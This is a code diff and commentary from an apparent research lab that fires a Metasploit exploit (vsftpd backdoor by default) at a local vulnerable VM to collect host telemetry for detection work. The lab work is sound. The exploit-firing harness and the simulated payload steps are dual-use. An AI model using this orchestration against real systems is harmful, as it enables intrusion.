+        # Connect the controller's event sink to the runner now that
+        # both exist. (Forward-reference closure pattern keeps the
+        # constructor argument order natural.)
+        runner_for_emit["runner"] = runner
+        result = runner.run()

         controller.teardown()
         serial.close()
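The `--run-dir` default in the hunk above resolves in three steps: an explicit CLI flag, then the `RUN_DIR` environment variable, then a per-slot path built from `SLOT`. A small sketch of that resolution order, written as a standalone function so it can be checked without argparse, could look like this. The function name `resolve_run_dir` and its `prefix` parameter are assumptions made for illustration; the real script expresses the same order through the argparse `default=` expression.

```python
from __future__ import annotations

from collections.abc import Mapping


def resolve_run_dir(
    cli_value: str | None,
    environ: Mapping[str, str],
    prefix: str = "/tmp/cis490-vm",
) -> str:
    """Pick the QEMU run dir: CLI flag, then RUN_DIR, then a per-slot default."""
    if cli_value:
        # 1) explicit --run-dir always wins
        return cli_value
    # 2) RUN_DIR (set by the fleet runner), else 3) <prefix>-<SLOT>, SLOT defaulting to 0
    return environ.get("RUN_DIR") or f"{prefix}-{environ.get('SLOT', '0')}"


print(resolve_run_dir(None, {"SLOT": "3"}))
```

Because each slot maps to its own directory, two parallel launches with different `SLOT` values no longer remove each other's pidfiles when they wipe stale state at startup.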
300
tools/run_tier3_demo.py
Normal file
@@ -0,0 +1,300 @@
"""Tier-3: real VM, real exploit, honest ``armed -> infecting`` transition.

Boots the vulnerable target VM, drives an msfrpcd-fired exploit module
against it, and lets the orchestrator's host /proc collector sample
the qemu-system pid throughout. Compared to ``run_real_vm_demo.py``:
the workload that crosses the ``armed -> infecting`` boundary is now
generated by an actual exploit landing a session, not by a script in
the guest.

Prereqs:
  - vm/images/<target>.qcow2 (e.g. Metasploitable2)
  - msfrpcd running locally:
      msfrpcd -P <password> -U msf -a 127.0.0.1 -p 55553
  - ``msgpack`` python package installed (added to runtime deps)

Run:
    MSFRPC_PASSWORD=<pass> uv run python tools/run_tier3_demo.py \\
        --module vsftpd_234_backdoor \\
        --data-root data
"""

from __future__ import annotations

import argparse
import logging
import os
import signal
import subprocess
import sys
import time
from pathlib import Path

# Allow running as a script.
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))

from collectors import qmp  # noqa: E402
from exploits.driver import DriverConfig, MSFExploitDriver  # noqa: E402
from exploits.modules import load_module_config  # noqa: E402
from exploits.msfrpc import MSFRpcClient, MSFRpcConfig  # noqa: E402
from orchestrator.episode import EpisodeConfig, EpisodeRunner  # noqa: E402
from samples.manifest import SampleManifest  # noqa: E402


# Same envelope shape as Tier 2 so plots are comparable. Slightly more
# armed/infecting time because real exploit fire + session establishment
# takes hundreds of ms to a few seconds.
DEFAULT_SCHEDULE = [
    ("clean", 10.0),
    ("armed", 3.0),
    ("infecting", 5.0),
    ("infected_running", 25.0),
    ("dormant", 15.0),
    ("infected_running", 20.0),
    ("dormant", 5.0),
    ("clean", 5.0),
]


def _wait_for_path(path: Path, timeout_s: float) -> None:
    deadline = time.monotonic() + timeout_s
    while time.monotonic() < deadline:
        if path.exists() and path.read_text().strip():
            return
        time.sleep(0.2)
    raise TimeoutError(f"{path} never appeared within {timeout_s}s")


def _wait_for_tcp(host: str, port: int, timeout_s: float) -> None:
    import socket
    deadline = time.monotonic() + timeout_s
    last_err: Exception | None = None
    while time.monotonic() < deadline:
        try:
            with socket.create_connection((host, port), timeout=1.0):
                return
        except OSError as e:
            last_err = e
            time.sleep(1.0)
    raise TimeoutError(
        f"target service {host}:{port} not reachable within {timeout_s}s "
        f"(last: {last_err})"
    )


def main() -> int:
    parser = argparse.ArgumentParser(prog="run_tier3_demo")
    parser.add_argument("--data-root", default="data")
    parser.add_argument("--interval-ms", type=int, default=100)
    parser.add_argument(
        "--module",
        default="vsftpd_234_backdoor",
        help="Module config name in exploits/modules/<name>.toml",
    )
    parser.add_argument(
        "--target-ip",
        default="127.0.0.1",
        help="Address the exploit module sets RHOSTS to. With the SLIRP "
             "launcher (default), the guest's vulnerable port is hostfwd'd to "
             "loopback; on a host-only bridge, this is the guest's bridge IP.",
    )
    parser.add_argument(
        "--target-port",
        type=int,
        default=21,
        help="Probe port to wait on before firing the exploit",
    )
    parser.add_argument(
        "--run-dir",
        # Per-slot defaults so the fleet runner's parallel calls don't
        # collide on the same /tmp dir. See run_real_vm_demo.py for
        # the same fix.
        default=(
            os.environ.get("RUN_DIR")
            or f"/tmp/cis490-target-{os.environ.get('SLOT', '0')}"
        ),
        help="QEMU run dir (sockets + pidfile)",
    )
    parser.add_argument(
        "--msfrpc-host", default=os.environ.get("MSFRPC_HOST", "127.0.0.1"),
    )
    parser.add_argument(
        "--msfrpc-port", type=int,
        default=int(os.environ.get("MSFRPC_PORT", "55553")),
    )
    parser.add_argument(
        "--msfrpc-user", default=os.environ.get("MSFRPC_USER", "msf"),
    )
    parser.add_argument(
        "--keep-vm",
        action="store_true",
        help="leave the VM running after the episode finishes",
    )
    parser.add_argument(
        "--target-boot-timeout",
        type=float,
        default=180.0,
        help="how long to wait for the guest's vulnerable service to listen",
    )
    parser.add_argument(
        "--sample",
        default=os.environ.get("SAMPLE_NAME"),
        help="Pick a workload profile from the manifest by name. Fleet runner "
             "passes this via SAMPLE_NAME env. Without it, falls back to the v1 yes-loop.",
    )
    parser.add_argument(
        "--manifest",
        default=str(Path(__file__).resolve().parent.parent / "samples" / "manifest.toml"),
    )
    args = parser.parse_args()

    logging.basicConfig(
        level=logging.INFO,
        format="%(asctime)s %(levelname)s %(name)s %(message)s",
    )
    log = logging.getLogger("cis490.run_tier3_demo")

    msfrpc_password = os.environ.get("MSFRPC_PASSWORD")
    if not msfrpc_password:
        log.error("MSFRPC_PASSWORD env var must be set")
        return 2

    repo_root = Path(__file__).resolve().parent.parent
    launcher = repo_root / "vm" / "launch_target.sh"
    modules_dir = repo_root / "exploits" / "modules"
    module_path = modules_dir / f"{args.module}.toml"
    if not module_path.exists():
        log.error("no module config at %s", module_path)
        return 2

    module = load_module_config(module_path)
    log.info("module loaded: %s (%s)", module.name, module.module_path)

    sample = None
    if args.sample:
        manifest = SampleManifest.load(args.manifest)
        sample = next((s for s in manifest.samples if s.name == args.sample), None)
        if sample is None:
            log.error("sample %r not in manifest %s", args.sample, args.manifest)
            return 2
        log.info("sample=%s profile=%s kind=%s",
                 sample.name, sample.profile, sample.kind)

    run_dir = Path(args.run_dir)
    if run_dir.exists():
        import shutil
        shutil.rmtree(run_dir)
    run_dir.mkdir(parents=True, exist_ok=True)
    pid_file = run_dir / "qemu.pid"

    log.info("booting target VM via %s (RUN_DIR=%s)", launcher, run_dir)
    env = os.environ.copy()
    env["RUN_DIR"] = str(run_dir)
    qemu = subprocess.Popen(
        [str(launcher)],
        cwd=str(repo_root),
        env=env,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
        start_new_session=True,
    )

    try:
        _wait_for_path(pid_file, timeout_s=15.0)
        qemu_pid = int(pid_file.read_text().strip())
        log.info("qemu pid = %d; waiting for service on %s:%d (timeout %.0fs)",
                 qemu_pid, args.target_ip, args.target_port,
                 args.target_boot_timeout)
        _wait_for_tcp(args.target_ip, args.target_port, args.target_boot_timeout)
        log.info("target service is up")

        # Pre-exploit savevm so EpisodeConfig.revert_at_{start,end}
        # has a known-good baseline to load. Best-effort: we still
        # run the episode if savevm fails (just without revert
        # support). See run_real_vm_demo.py for the same pattern.
        qmp_sock = run_dir / "qmp.sock"
        if qmp_sock.exists():
            try:
                _qmp = qmp.QMPClient(qmp_sock)
                _qmp.connect()
                try:
                    out = _qmp.savevm("baseline-v1")
                    log.info("savevm baseline-v1 OK: %s", out.strip()[:160])
                finally:
                    _qmp.close()
            except Exception as e:
                log.warning("savevm failed; revert_at_start unusable: %s", e)

        client = MSFRpcClient(
            MSFRpcConfig(
                host=args.msfrpc_host,
                port=args.msfrpc_port,
                user=args.msfrpc_user,
                password=msfrpc_password,
            )
        )

        cfg = EpisodeConfig(
            target_pid=qemu_pid,
            duration_s=sum(d for _, d in DEFAULT_SCHEDULE),
            interval_ms=args.interval_ms,
            data_root=Path(args.data_root),
            phase_schedule=DEFAULT_SCHEDULE,
            image_name=module.name + "-target",
            snapshot_name="baseline-v1",
            sample=sample,
            exploit_meta={
                "framework": "metasploit",
                "module": module.module_path,
                "module_type": module.module_type,
                "module_name": module.name,
                "payload": module.payload_path,
                "rport": module.options.get("RPORT"),
                "rhost_template": module.options.get("RHOSTS"),
            },
        )
        runner = EpisodeRunner(cfg)

        driver = MSFExploitDriver(
            client=client,
            module=module,
            cfg=DriverConfig(
                target_ip=args.target_ip,
                sample_store_root=repo_root / "samples" / "store",
            ),
            emit_event=runner.emit_event,
            sample=sample,
        )
        runner.on_phase = driver.set_phase

        driver.setup()
        try:
            result = runner.run()
        finally:
            driver.teardown()

        print()
        print(f"episode_id = {result.episode_id}")
        print(f"path = {result.episode_dir}")
        print(f"rows_proc = {result.rows_proc}")
        print(f"phases = {result.phases_observed}")
        print(f"module = {module.module_path}")
        print()
        print("To plot:")
        print(f" uv run python tools/plot_envelope.py {result.episode_dir}")
        return 0
    finally:
        if not args.keep_vm:
            log.info("shutting down VM (pid=%d)", qemu.pid)
            try:
                os.killpg(os.getpgid(qemu.pid), signal.SIGTERM)
            except ProcessLookupError:
                pass
            try:
                qemu.wait(timeout=5)
            except subprocess.TimeoutExpired:
                os.killpg(os.getpgid(qemu.pid), signal.SIGKILL)


if __name__ == "__main__":
    sys.exit(main())
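The phase schedule in `run_tier3_demo.py` is a list of `(phase, seconds)` pairs, and the episode duration is their sum. As a rough illustration of how those pairs turn into wall-clock windows, the sketch below derives start and end offsets for each phase. The helper name `phase_windows` is hypothetical; the schedule values are copied from `DEFAULT_SCHEDULE` above, and how the orchestrator itself tracks phase boundaries is not shown in this diff.

```python
from itertools import accumulate

# Copied from DEFAULT_SCHEDULE in run_tier3_demo.py.
SCHEDULE = [
    ("clean", 10.0),
    ("armed", 3.0),
    ("infecting", 5.0),
    ("infected_running", 25.0),
    ("dormant", 15.0),
    ("infected_running", 20.0),
    ("dormant", 5.0),
    ("clean", 5.0),
]


def phase_windows(schedule):
    """Return (phase, start_s, end_s) for each entry, offsets from episode start."""
    ends = list(accumulate(d for _, d in schedule))
    starts = [0.0] + ends[:-1]
    return [(name, s, e) for (name, _), s, e in zip(schedule, starts, ends)]


windows = phase_windows(SCHEDULE)
total_s = windows[-1][2]
for name, start, end in windows:
    print(f"{name:<18} {start:5.1f} -> {end:5.1f}")
print("total:", total_s)
```

With these values the `infecting` window covers 13 s to 18 s and the whole episode lasts 88 s, which is the figure passed to `EpisodeConfig` as `duration_s`.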
@@ -22,21 +22,63 @@ fire and a real sample.
 from __future__ import annotations

 import logging
+import sys
+from pathlib import Path
+from typing import Callable

 from vm_serial import SerialClient

+# Allow running as a script (sibling of tools/).
+sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
+
+from exploits.workloads import Workload, workload_for  # noqa: E402
+from samples.manifest import Sample  # noqa: E402
+

 log = logging.getLogger("cis490.vm_load_controller")


+EmitEvent = Callable[..., None]
+
+
 class VMLoadController:
-    def __init__(self, serial: SerialClient) -> None:
+    """Drives a real Alpine guest through the phase schedule for
+    Tier 2 (no exploit). Workload is chosen by ``sample.profile``;
+    same profile catalog as the Tier-3 driver so a fleet wave
+    produces matched envelopes whether or not an exploit fires.
+
+    Without a sample, falls back to the original cpu-saturate yes-loop
+    (the original Tier-2 demo behaviour).
+
+    Every set_phase call emits an event into the runner's events.jsonl
+    so we can audit (a) whether the workload command actually got
+    sent, (b) whether the guest acknowledged it, and (c) whether the
+    expected process is running afterwards. Without those events,
+    silent failures (login partial, command swallowed by tty) produce
+    well-labeled but information-less episodes; see CIS490 history
+    where every phase median'd 20% CPU on elliott-lab."""
+
+    def __init__(
+        self,
+        serial: SerialClient,
+        sample: Sample | None = None,
+        emit_event: EmitEvent | None = None,
+    ) -> None:
         self.s = serial
+        self.sample = sample
+        self.workload: Workload | None = workload_for(sample)
+        # No-op default so callers don't have to thread an emitter.
+        self.emit: EmitEvent = emit_event or (lambda *a, **kw: None)

     def setup(self) -> None:
         # Kill any pre-existing load and clear scratch space.
         self._kill_load()
         self.s.run("rm -f /tmp/payload /tmp/armed.log; echo setup-ok")
+        self.emit(
+            "workload_setup",
+            profile=self.workload.profile if self.workload else "v1-yes",
+            sample=self.sample.name if self.sample else None,
+        )

     def teardown(self) -> None:
         self._kill_load()
@@ -44,29 +86,86 @@ class VMLoadController:
     # ---- phases ---------------------------------------------------------

     def set_phase(self, phase: str) -> None:
-        log.info("vm phase -> %s", phase)
-        if phase == "clean":
-            self._kill_load()
-        elif phase == "armed":
-            self.s.run("echo armed-handshake-$(date +%s) > /tmp/armed.log")
-        elif phase == "infecting":
-            self.s.run(
-                "dd if=/dev/urandom of=/tmp/payload bs=4k count=128 2>/dev/null && "
-                "chmod +x /tmp/payload"
+        log.info("vm phase -> %s (profile=%s)",
+                 phase, self.workload.profile if self.workload else "v1")
+        try:
+            if phase == "clean":
+                self._kill_load()
+                self._emit_phase("workload_killed", phase)
+            elif phase == "armed":
+                self.s.run("echo armed-handshake-$(date +%s) > /tmp/armed.log")
+                self._emit_phase("workload_armed", phase)
+            elif phase == "infecting":
+                self.s.run(
+                    "dd if=/dev/urandom of=/tmp/payload bs=4k count=128 2>/dev/null && "
+                    "chmod +x /tmp/payload"
+                )
+                self._emit_phase("workload_infecting", phase)
+            elif phase == "infected_running":
+                self._kill_load()
+                if self.workload is not None:
+                    self.s.run(self.workload.start_cmd)
+                else:
+                    self.s.run(
+                        "nohup sh -c 'yes > /dev/null' </dev/null >/dev/null 2>&1 & disown"
+                    )
+                self._emit_phase("workload_started", phase)
+            elif phase == "dormant":
+                # Probe BEFORE we kill so we see whether the workload
+                # was actually running. If the probe says nothing was
+                # running, the previous infected_running was a no-op
+                # and the trainer should filter this episode.
+                probe = self._probe()
+                self._kill_load()
+                self._emit_phase("workload_killed", phase, pre_kill_probe=probe)
+            else:
+                log.warning("unknown phase: %s", phase)
+        except Exception as e:
+            # Don't propagate: the runner already swallows on_phase
+            # exceptions. But DO record so the episode is filterable.
+            log.exception("set_phase(%s) failed", phase)
+            self.emit(
+                "workload_failed",
+                phase=phase,
+                error=str(e)[:200],
+                profile=self.workload.profile if self.workload else "v1-yes",
             )
-        elif phase == "infected_running":
-            self._kill_load()
-            # Background CPU burner. `nohup` + `&` + redirects to detach.
-            self.s.run(
-                "nohup sh -c 'yes > /dev/null' </dev/null >/dev/null 2>&1 & disown"
-            )
-        elif phase == "dormant":
-            self._kill_load()
-        else:
-            log.warning("unknown phase: %s", phase)

     # ---- internals ------------------------------------------------------

     def _kill_load(self) -> None:
         # `true` at the end so the run() exit status is always 0.
+        if self.workload is not None:
+            self.s.run(self.workload.stop_cmd)
+        # Always sweep the v1 leftover commands too, in case we just
+        # switched profiles mid-fleet-run.
         self.s.run("pkill yes 2>/dev/null; pkill stress-ng 2>/dev/null; true")
+
+    def _probe(self) -> dict:
+        """Ask the guest what's actually running. Returns a small dict
+        the caller stamps into the event so trainers can detect the
+        "workload didn't fire" case from meta alone."""
+        try:
+            out = self.s.run(
+                "echo yes=$(pgrep -c yes 2>/dev/null || echo 0); "
+                "echo sh=$(pgrep -c sh 2>/dev/null || echo 0); "
+                "echo loadavg=$(awk '{print $1}' /proc/loadavg)"
+            )
+            stats: dict = {}
+            for line in out.splitlines():
+                line = line.strip()
+                if "=" not in line:
+                    continue
+                k, _, v = line.partition("=")
+                stats[k.strip()] = v.strip()
+            return stats
+        except Exception as e:
+            return {"probe_error": str(e)[:120]}
+
+    def _emit_phase(self, event: str, phase: str, **extra) -> None:
+        self.emit(
+            event,
+            phase=phase,
+            profile=self.workload.profile if self.workload else "v1-yes",
+            sample=self.sample.name if self.sample else None,
+            **extra,
+        )
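The `_probe` helper in `vm_load_controller.py` parses `key=value` lines echoed back over the serial console and stores the values as strings. The sketch below isolates that parsing step and adds one possible way a consumer might decide whether the v1 `yes` workload was running. Both `parse_probe` and `workload_was_running` are illustrative names rather than functions from the repo, and the tolerant integer handling is an assumption about how a downstream filter could treat odd or missing values.

```python
from __future__ import annotations


def parse_probe(out: str) -> dict[str, str]:
    """Parse 'key=value' lines; lines without '=' (prompts, noise) are skipped."""
    stats: dict[str, str] = {}
    for line in out.splitlines():
        line = line.strip()
        if "=" not in line:
            continue
        k, _, v = line.partition("=")
        stats[k.strip()] = v.strip()
    return stats


def workload_was_running(stats: dict[str, str], key: str = "yes") -> bool:
    """True if the probe counted at least one matching process.

    Only the first whitespace-separated token is read, so a malformed or
    multi-token value degrades to False instead of raising.
    """
    try:
        return int(stats.get(key, "0").split()[0]) > 0
    except (ValueError, IndexError):
        return False


sample_out = "yes=1\nsh=3\nloadavg=0.97\nlocalhost:~# \n"
stats = parse_probe(sample_out)
print(stats, workload_was_running(stats))
```

A probe that failed outright carries only a `probe_error` key, which this check treats the same as "nothing was running".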
274
vm/guest-agent/cis490_agent.py
Normal file
@ -0,0 +1,274 @@
#!/usr/bin/env python3
"""In-guest telemetry agent — runs INSIDE the VM.

Writes one JSON-lines row per tick to a virtio-serial port that the
host has wired up as ``cis490.guest.agent``. The host-side collector
(`collectors.guest_agent`) reads these rows and stamps them with the
host's monotonic clock before persisting to ``telemetry-guest.jsonl``.

Stdlib only — no `psutil`, no extra deps to bake into the guest. Every
field is read from /proc (or /sys, for the thermal zone) on the guest,
so this works on busybox-based Alpine, on Cirros, and on
Metasploitable2 unchanged.

Wire path inside the guest:
    /dev/virtio-ports/cis490.guest.agent

The host side opens the matching unix socket on the hypervisor.
The protocol is intentionally trivial: the agent emits
newline-delimited JSON; the host emits nothing back. One direction.

This source is the **deployable** side — every row is tagged
``available_in_deployment: true``. See docs/threat-model.md.
"""

from __future__ import annotations

import argparse
import json
import os
import platform
import sys
import time
from typing import Any


SOURCE = "guest_agent"
AVAILABLE_IN_DEPLOYMENT = True
DEFAULT_PORT = "/dev/virtio-ports/cis490.guest.agent"
DEFAULT_INTERVAL_MS = 100  # 10 Hz
DEFAULT_TOP_N = 8


# ---------- /proc parsers ---------------------------------------------------


def _read(path: str) -> str | None:
    try:
        with open(path, "rb") as f:
            return f.read().decode("ascii", errors="replace")
    except OSError:
        # Covers FileNotFoundError and PermissionError, plus the
        # ProcessLookupError raised when a process exits between
        # open() and read() of its /proc/<pid>/ entries.
        return None


def read_loadavg() -> tuple[float, float, float] | None:
    text = _read("/proc/loadavg")
    if text is None:
        return None
    parts = text.split()
    return float(parts[0]), float(parts[1]), float(parts[2])


def read_meminfo() -> dict[str, int]:
    text = _read("/proc/meminfo")
    out: dict[str, int] = {}
    if text is None:
        return out
    for line in text.splitlines():
        k, _, rest = line.partition(":")
        v = rest.strip()
        if v.endswith(" kB"):
            try:
                out[k] = int(v[:-3]) * 1024
            except ValueError:
                pass
    return out


def read_cpu_total() -> dict[str, int] | None:
    """First line of /proc/stat: aggregate cpu user/nice/sys/idle/...
    in jiffies since boot."""
    text = _read("/proc/stat")
    if text is None:
        return None
    line = text.splitlines()[0]
    fields = line.split()
    # cpu user nice system idle iowait irq softirq steal guest guest_nice
    if not fields or fields[0] != "cpu":
        return None
    nums = [int(x) for x in fields[1:]]
    # Older kernels report fewer columns; pad the missing ones with 0.
    pad = nums + [0] * max(0, 10 - len(nums))
    return {
        "user": pad[0],
        "nice": pad[1],
        "system": pad[2],
        "idle": pad[3],
        "iowait": pad[4],
        "irq": pad[5],
        "softirq": pad[6],
        "steal": pad[7],
        "guest": pad[8],
        "guest_nice": pad[9],
    }


def read_thermal_milli_c() -> int | None:
    """Best-effort: /sys/class/thermal/thermal_zone0/temp."""
    text = _read("/sys/class/thermal/thermal_zone0/temp")
    if text is None:
        return None
    try:
        return int(text.strip())
    except ValueError:
        return None


def read_net_devs() -> dict[str, dict[str, int]]:
    """Parse /proc/net/dev → {iface: {rx_bytes, tx_bytes, rx_pkts, tx_pkts}}."""
    text = _read("/proc/net/dev")
    out: dict[str, dict[str, int]] = {}
    if text is None:
        return out
    lines = text.splitlines()
    for line in lines[2:]:  # skip the two header lines
        if ":" not in line:
            continue
        name, _, rest = line.partition(":")
        name = name.strip()
        if name == "lo":
            continue
        cols = rest.split()
        if len(cols) < 16:
            continue
        out[name] = {
            "rx_bytes": int(cols[0]),
            "rx_pkts": int(cols[1]),
            "tx_bytes": int(cols[8]),
            "tx_pkts": int(cols[9]),
        }
    return out


def read_listen_ports() -> list[int]:
    """TCP listen sockets from /proc/net/tcp + tcp6. State 0A = LISTEN."""
    out: set[int] = set()
    for path in ("/proc/net/tcp", "/proc/net/tcp6"):
        text = _read(path)
        if not text:
            continue
        for line in text.splitlines()[1:]:
            cols = line.split()
            if len(cols) < 4:
                continue
            if cols[3] != "0A":
                continue
            local = cols[1]  # "ADDR:PORT" with PORT in hex
            _, _, port_hex = local.rpartition(":")
            try:
                out.add(int(port_hex, 16))
            except ValueError:
                pass
    return sorted(out)


def read_top_procs(top_n: int) -> list[dict[str, Any]]:
    """Top-N processes by RSS. Cheap O(N) scan of /proc."""
    procs: list[dict[str, Any]] = []
    try:
        entries = os.listdir("/proc")
    except OSError:
        return procs
    for ent in entries:
        if not ent.isdigit():
            continue
        pid = int(ent)
        stat = _read(f"/proc/{pid}/stat")
        if stat is None:
            continue
        try:
            # comm may itself contain spaces or parens, so split on the
            # LAST ")" and index the remaining fields from "state" on.
            rparen = stat.rindex(")")
            comm = stat[stat.index("(") + 1 : rparen]
            fields = stat[rparen + 2:].split()
            utime = int(fields[11])
            stime = int(fields[12])
            rss_pages = int(fields[21])
        except (ValueError, IndexError):
            continue
        procs.append({
            "pid": pid,
            "comm": comm[:32],
            "cpu_jiffies": utime + stime,
            "rss_bytes": rss_pages * os.sysconf("SC_PAGESIZE"),
        })
    procs.sort(key=lambda p: p["rss_bytes"], reverse=True)
    return procs[:top_n]


# ---------- one tick --------------------------------------------------------


def collect_once(top_n: int = DEFAULT_TOP_N) -> dict[str, Any]:
    mem = read_meminfo()
    cpu = read_cpu_total()
    load = read_loadavg()
    return {
        "t_guest_mono_ns": time.monotonic_ns(),
        "t_guest_wall_ns": time.time_ns(),
        "source": SOURCE,
        "available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
        "kernel": platform.release(),
        "cpu_total_jiffies": cpu,
        "load_1m_5m_15m": list(load) if load else None,
        "mem_total_bytes": (mem.get("MemTotal") or 0),
        "mem_available_bytes": (mem.get("MemAvailable") or 0),
        "mem_buffers_bytes": (mem.get("Buffers") or 0),
        "mem_cached_bytes": (mem.get("Cached") or 0),
        "swap_used_bytes": (mem.get("SwapTotal", 0) - mem.get("SwapFree", 0)),
        "thermal_milli_c": read_thermal_milli_c(),
        "net": read_net_devs(),
        "listen_ports": read_listen_ports(),
        "top_procs": read_top_procs(top_n),
    }


# ---------- main loop -------------------------------------------------------


def main(argv: list[str] | None = None) -> int:
    p = argparse.ArgumentParser(prog="cis490-guest-agent")
    p.add_argument("--port", default=DEFAULT_PORT,
                   help="virtio-serial port path inside the guest")
    p.add_argument("--interval-ms", type=int, default=DEFAULT_INTERVAL_MS)
    p.add_argument("--top-n", type=int, default=DEFAULT_TOP_N)
    p.add_argument("--once", action="store_true",
                   help="emit a single row and exit (for smoke tests)")
    args = p.parse_args(argv)

    if args.once:
        sys.stdout.write(json.dumps(collect_once(args.top_n)) + "\n")
        sys.stdout.flush()
        return 0

    # Open the virtio-serial port. If the host hasn't wired one up,
    # fall back to stdout so the agent is testable on bare-metal too.
    out_fp: Any
    if os.path.exists(args.port):
        out_fp = open(args.port, "wb", buffering=0)
    else:
        sys.stderr.write(f"[cis490-agent] {args.port} missing; writing to stdout\n")
        out_fp = sys.stdout.buffer

    interval_ns = args.interval_ms * 1_000_000
    next_tick = time.monotonic_ns()
    try:
        while True:
            row = collect_once(args.top_n)
            out_fp.write((json.dumps(row) + "\n").encode("utf-8"))
            try:
                out_fp.flush()
            except (AttributeError, OSError):
                pass
            next_tick += interval_ns
            sleep_ns = next_tick - time.monotonic_ns()
            if sleep_ns > 0:
                time.sleep(sleep_ns / 1_000_000_000)
            else:
                # Overran the tick; resynchronise instead of bursting.
                next_tick = time.monotonic_ns()
    except KeyboardInterrupt:
        return 0
    except (BrokenPipeError, OSError) as e:
        sys.stderr.write(f"[cis490-agent] write failed: {e}\n")
        return 1


if __name__ == "__main__":
    sys.exit(main())
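
Each row carries `cpu_total_jiffies` as counters since boot, so a consumer has to difference two rows to get utilisation. A minimal sketch of that step follows, assuming the row layout emitted by `collect_once`; `cpu_busy_fraction` is a hypothetical helper, not part of the agent or the host collector. `guest` and `guest_nice` are left out of the sum because the kernel already counts them inside `user` and `nice`.

```python
from __future__ import annotations

BUSY_KEYS = ("user", "nice", "system", "irq", "softirq", "steal")
IDLE_KEYS = ("idle", "iowait")


def cpu_busy_fraction(prev: dict[str, int], curr: dict[str, int]) -> float | None:
    """Fraction of jiffies spent non-idle between two counter snapshots.

    Returns None when no time elapsed (or the counters went backwards,
    e.g. across a guest reboot).
    """
    busy = sum(curr[k] - prev[k] for k in BUSY_KEYS)
    idle = sum(curr[k] - prev[k] for k in IDLE_KEYS)
    total = busy + idle
    if total <= 0:
        return None
    return busy / total


if __name__ == "__main__":
    zero = dict.fromkeys(BUSY_KEYS + IDLE_KEYS + ("guest", "guest_nice"), 0)
    later = {**zero, "user": 30, "system": 10, "idle": 60}
    print(cpu_busy_fraction(zero, later))
```

At the default 10 Hz a single tick spans only a handful of jiffies on a one-vCPU guest, so differencing over several rows may give a steadier estimate.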
@ -16,7 +16,17 @@ set -euo pipefail
 REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
 IMAGE="${IMAGE:-$REPO_ROOT/vm/images/alpine-baseline.qcow2}"
 CIDATA="${CIDATA:-$REPO_ROOT/vm/images/cidata.iso}"
-RUN_DIR="${RUN_DIR:-/tmp/cis490-vm}"
+# SLOT lets the fleet runner spin up N concurrent VMs without socket /
+# port collisions. With the default SLOT=0 the ssh hostfwd port stays
+# 2222; the default RUN_DIR becomes /tmp/cis490-vm-0.
+SLOT="${SLOT:-0}"
+RUN_DIR="${RUN_DIR:-/tmp/cis490-vm-$SLOT}"
+SSH_PORT="${SSH_PORT:-$((2222 + SLOT))}"
+# When BRIDGE is set, attach a tap to the host-only bridge instead of
+# using SLIRP usermode networking. The tap must already exist and be a
+# member of the bridge — see vm/setup_bridge.sh + (operator) ip tuntap.
+BRIDGE="${BRIDGE:-}"
+TAP="${TAP:-cis490tap$SLOT}"

 mkdir -p "$RUN_DIR"
 QMP_SOCK="$RUN_DIR/qmp.sock"
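
The per-slot defaults in this hunk are simple arithmetic on `SLOT`. A small sketch of the same derivation, useful for checking that a planned fleet has no collisions, is shown here; `slot_defaults` and `check_fleet` are hypothetical names, and the values mirror only the defaults visible in the hunk (explicit `RUN_DIR`, `SSH_PORT`, or `TAP` overrides are not modelled).

```python
def slot_defaults(slot: int = 0) -> dict:
    """Default run dir, ssh forward port, and tap name for one slot."""
    if slot < 0:
        raise ValueError("slot must be non-negative")
    return {
        "run_dir": f"/tmp/cis490-vm-{slot}",
        "ssh_port": 2222 + slot,
        "tap": f"cis490tap{slot}",
    }


def check_fleet(slots: list[int]) -> None:
    """Raise if two slots would share a run dir, port, or tap name."""
    for field in ("run_dir", "ssh_port", "tap"):
        values = [slot_defaults(s)[field] for s in slots]
        if len(set(values)) != len(values):
            raise ValueError(f"collision on {field}: {values}")


if __name__ == "__main__":
    check_fleet([0, 1, 2, 3])
    print(slot_defaults(3))
```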
@ -32,8 +42,14 @@ if [[ ! -f "$CIDATA" ]]; then
     exit 1
 fi

+AGENT_SOCK="$RUN_DIR/agent.sock"
+
 # snapshot=on routes guest writes through a temporary overlay so the qcow2
 # on disk is never mutated — every boot starts from the same bytes.
+#
+# Second virtio-serial port (cis490.guest.agent) carries telemetry
+# from the in-guest agent. Surfaces inside the guest at
+# /dev/virtio-ports/cis490.guest.agent and on the host at $AGENT_SOCK.
 exec qemu-system-x86_64 \
     -name cis490-vm \
     -machine q35,accel=kvm \
@ -42,8 +58,15 @@ exec qemu-system-x86_64 \
     -m 256 \
     -drive file="$IMAGE",format=qcow2,if=virtio,snapshot=on \
     -drive file="$CIDATA",format=raw,if=virtio,readonly=on \
-    -netdev user,id=n0,hostfwd=tcp:127.0.0.1:2222-:22 \
+    $(if [[ -n "$BRIDGE" ]]; then \
+        echo -n "-netdev tap,id=n0,ifname=$TAP,script=no,downscript=no "; \
+      else \
+        echo -n "-netdev user,id=n0,hostfwd=tcp:127.0.0.1:$SSH_PORT-:22 "; \
+      fi) \
     -device virtio-net-pci,netdev=n0 \
+    -device virtio-serial-pci,id=cis490vs0 \
+    -chardev socket,id=cis490agent,path="$AGENT_SOCK",server=on,wait=off \
+    -device virtserialport,chardev=cis490agent,name=cis490.guest.agent \
     -nographic \
     -serial unix:"$RUN_DIR/serial.sock",server=on,wait=off \
     -monitor unix:"$MON_SOCK",server=on,wait=off \
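
Because the chardev is a listening unix socket (`server=on,wait=off`), a host-side reader only needs to connect to `$AGENT_SOCK` and read newline-delimited JSON. The sketch below shows one way that could look. It is not the repo's `collectors.guest_agent`; `stamp_rows`, `read_agent_socket`, and the `t_host_mono_ns` field name are assumptions made for illustration.

```python
import json
import socket
import time
from typing import Iterable, Iterator


def stamp_rows(lines: Iterable[bytes]) -> Iterator[dict]:
    """Decode JSON-lines rows and stamp each with the host monotonic clock.

    Undecodable lines are skipped: a reader that connects mid-row will
    see one truncated line before the stream resynchronises.
    """
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            row = json.loads(raw)
        except ValueError:
            continue
        if not isinstance(row, dict):
            continue
        row["t_host_mono_ns"] = time.monotonic_ns()  # hypothetical field name
        yield row


def read_agent_socket(path: str) -> Iterator[dict]:
    """Connect to the QEMU chardev socket and yield stamped rows."""
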